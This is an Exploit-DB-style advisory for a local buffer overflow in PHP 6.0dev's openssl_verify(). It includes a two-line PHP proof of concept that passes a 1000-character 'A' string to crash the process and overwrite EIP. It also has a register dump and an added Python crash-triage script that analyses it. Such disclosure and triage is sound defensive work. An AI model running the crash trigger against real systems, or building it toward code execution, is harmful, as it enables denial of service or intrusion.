vendor: PHP 6.0
by: Pr0T3cT10n
CVSS: 9.3 HIGH
Local Buffer Overflow
CWE: 119
Product Name: PHP 6.0
Affected Version From: 6.0
Affected Version To: 6.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:php:php:6.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WIN XP
2009

PHP 6.0 openssl_verify() Local Buffer Overflow PoC

PHP 6.0 contains a local buffer overflow in the openssl_verify() function. The overflow is triggered when a specially crafted string is passed to openssl_verify(). This can crash the application or potentially allow an attacker to execute arbitrary code on the vulnerable system. In the PoC below, the crafted string is 1000 "A" characters passed as the third argument, and the register dump in its comments shows EIP overwritten with 00410041.

Mitigation:

Upgrade to the latest version of PHP 6.0 and apply the latest security patches.

Exploit-DB raw data:

<?php
// ==================================================================================
//
// PHP 6.0 openssl_verify() Local Buffer Overflow PoC
//
// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
//
// ==================================================================================
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
// EIP 00410041
//
// ==================================================================================

$buffer = str_repeat("A", 1000);
openssl_verify(1,1,$buffer);
?>
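
A crash-triage sketch for the register dump in the PoC's comments, added here as an example (it is not part of the Exploit-DB entry, and the function names are hypothetical). It checks whether the faulting EIP is built from the filler byte, either directly or after the input was widened to UTF-16LE, which is what the UNICODE annotations in the dump suggest.

```python
import re

# Register dump copied from the PoC's comment block on this page.
DUMP = """\
EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
EIP 00410041
"""

# Register name, 8 hex digits, optional debugger annotation such as UNICODE "AAA....".
REG = re.compile(r'\b(E[A-Z]{2}) ([0-9A-F]{8})(?: (UNICODE|ASCII) "([^"]*)")?')


def parse_dump(text):
    """Return {register: (value, annotation_kind, annotation_text)}."""
    return {m[1]: (int(m[2], 16), m[3], m[4]) for m in REG.finditer(text)}


def classify_value(value, filler):
    """Report whether a 32-bit little-endian value is made of the filler byte."""
    raw = value.to_bytes(4, "little")
    if raw == filler * 4:
        return "ascii"      # input bytes copied unchanged
    if raw == (filler + b"\x00") * 2:
        return "utf16le"    # each input byte widened to two bytes
    return None


def triage(text, filler=b"A"):
    """Summarise whether the crash shows input-derived control of EIP."""
    regs = parse_dump(text)
    encoding = classify_value(regs["EIP"][0], filler)
    # Registers the debugger annotated as pointing into the filler string.
    pointers = sorted(
        name for name, (_, kind, s) in regs.items()
        if kind and s.startswith(filler.decode() * 3)
    )
    return {
        "eip_from_input": encoding is not None,
        "encoding": encoding,
        "pointers_into_input": pointers,
    }


if __name__ == "__main__":
    print(triage(DUMP))
```

An EIP derived from input, with ESP and EBP pointing into the same data, indicates that saved stack state was overwritten, so a crash with this signature should be prioritised for patching rather than treated as a plain denial of service.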